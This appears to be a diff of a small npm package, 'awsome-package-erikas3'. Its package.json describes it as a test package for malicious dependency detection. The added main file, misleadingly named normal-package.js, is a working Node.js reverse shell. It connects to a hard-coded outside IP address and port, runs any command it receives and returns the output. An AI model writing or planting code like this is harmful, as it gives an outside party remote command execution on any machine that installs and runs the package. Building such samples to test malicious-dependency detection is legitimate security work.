awsome-package-erikas3 1.0.0

package/normal-package.js

@@ -0,0 +1,31 @@
+// reverse-shell.js
+const net = require("net");
+const { exec } = require("child_process");
+
+const HOST = "141.136.44.52"; // Change this to your attacker's IP address
+const PORT = 50502; // Change this to your desired port
+
+const client = new net.Socket();
+client.connect(PORT, HOST, () => {
+  console.log(`Connected to ${HOST}:${PORT}`);
+  client.write("Connection established\n");
+});
+
+client.on("data", (data) => {
+  exec(data.toString(), (err, stdout, stderr) => {
+    if (err) {
+      client.write(`Error: ${stderr}\n`);
+    } else {
+      client.write(stdout);
+    }
+  });
+});
+
+client.on("error", (err) => {
+  console.error(`Connection error: ${err.message}`);
+  client.destroy();
+});
+
+client.on("close", () => {
+  console.log("Connection closed");
+});

package/package.json

@@ -0,0 +1,18 @@
+{
+  "name": "awsome-package-erikas3",
+  "version": "1.0.0",
+  "description": "A test package for malicious dependency detection",
+  "main": "normal-package.js",
+  "scripts": {
+    "start": "node normal-package.js"
+  },
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/balamutas/awsomedependency.git"
+  },
+  "author": "Your Name",
+  "license": "MIT",
+  "dependencies": {
+    "net": "^1.0.2"
+  }
+}